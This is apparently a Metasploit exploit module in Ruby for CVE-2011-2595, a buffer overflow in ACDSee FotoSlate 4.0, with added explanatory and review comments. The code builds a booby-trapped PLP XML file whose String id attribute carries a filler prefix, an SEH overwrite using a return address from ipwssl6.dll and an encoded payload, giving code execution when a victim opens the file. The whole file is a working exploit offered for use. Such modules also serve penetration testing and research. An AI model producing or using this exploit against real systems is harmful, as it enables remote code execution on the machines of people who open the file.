##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# ACDSee FotoSlate 4.0 Build 146 PLP file-format module (CVE-2011-2595,
# OSVDB 75425, BID 49558).
#
# Nothing here talks to a remote host: the module builds a PLP (XML) document
# whose first <String> element carries an overlong `id` attribute, and writes
# that document to disk through the FILEFORMAT mixin.  The attribute value is
# made of a random prefix, an SEH record and the encoded payload (see #exploit).
class MetasploitModule < Msf::Exploit::Remote

# Reliability rank reported to the framework.
Rank = GoodRanking

# FILEFORMAT provides file_create (used at the end of #exploit) and the
# output-file handling; Seh provides generate_seh_record.
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

# Declares module metadata, the single target layout and the FILENAME option.
#
# @param info [Hash] module info supplied by the framework, merged via update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'ACDSee FotoSlate PLP File id Parameter Overflow',
'Description' => %q{
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
a specially crafted id parameter in a String element. When viewing a malicious
PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
buffer and execute arbitrary code. This exploit has been tested on systems such as
Windows XP SP3, Windows Vista, and Windows 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-2595' ],
[ 'OSVDB', '75425' ],
[ 'BID', '49558' ],
],
# The module only writes a file, so the framework is told not to start a
# payload handler; presumably the operator runs one separately -- confirm.
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true'
},
'Payload' =>
{
# 'Space' is deliberately left unset; the =begin/=end note at the end of
# the file explains why the buffer is kept short.  NOTE(review): with no
# 'Space', nothing bounds the encoded payload size, so the padding length
# computed in #exploit can go negative for a large payload -- confirm.
#'Space' => 4000,
# 0x00 would terminate the string on the C side; 0x22 (") would close the
# XML attribute the value is interpolated into (see the template in #exploit).
'BadChars' => "\x00\x22"
},
'Platform' => 'win',
'Targets' =>
[
[
'ACDSee FotoSlate 4.0 Build 146',
{
'Ret' => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
# Number of filler bytes placed before the SEH record (see #exploit).
'Offset' => 1812,
# Total size of the id attribute value; #exploit pads up to this length.
'TotalLength' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Sep 12 2011',
'DefaultTarget' => 0))

# FILENAME is the name of the generated PLP file, read back in #exploit.
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
], self.class)
end

# Builds the PLP document and writes it to disk.
#
# The attribute value is laid out as
#   [Offset random bytes][SEH record][encoded payload][alpha padding]
# and padded to target["TotalLength"] bytes.  It is interpolated into the id
# attribute of the first <String> element of the template below.
def exploit
# NOTE(review): rand_text is called without an explicit bad-char list, so
# this relies on the framework default honouring the module's BadChars; a
# 0x22 byte in the prefix would close the XML attribute early -- confirm.
overflow = rand_text(target["Offset"])
# nSEH/SEH pair pointing at target.ret.
overflow << generate_seh_record(target.ret)
overflow << payload.encoded
# Pad to the fixed total so the attribute value is always
# target["TotalLength"] bytes; the length goes negative if the payload is
# larger than the remaining room (see the 'Space' note in #initialize).
overflow << rand_text_alpha(target["TotalLength"] - overflow.length)

# Plain (non-squiggly) heredoc: the template lines' leading whitespace is
# written to the file exactly as it appears here.
plp =<<TEMPLATE
<?xml version="1.0" encoding="ISO-8859-1"?>
<ACDFotoSlateDocument15>
<PageDefinition>
<Template>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Properties>
<String id="#{overflow}"></String>
<String id="Width">8.500000IN</String>
<String id="Height">11.000000IN</String>
<String id="Orientation">Portrait</String>
<Bool id="AutoRotate">FALSE</Bool>
<Bool id="AutoFill">FALSE</Bool>
</Properties>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Properties>
<String id="XPos">0.500000IN</String>
<String id="YPos">0.500000IN</String>
<String id="Width">7.500000IN</String>
<String id="Height">10.000000IN</String>
<Float id="Tilt">0.000000</Float>
</Properties>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</Template>
<PageContent>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</PageContent>
</PageDefinition>
</ACDFotoSlateDocument15>
TEMPLATE

print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(plp)
end

end
=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
using a long buffer, since a long buffer could break meterpreter.
=end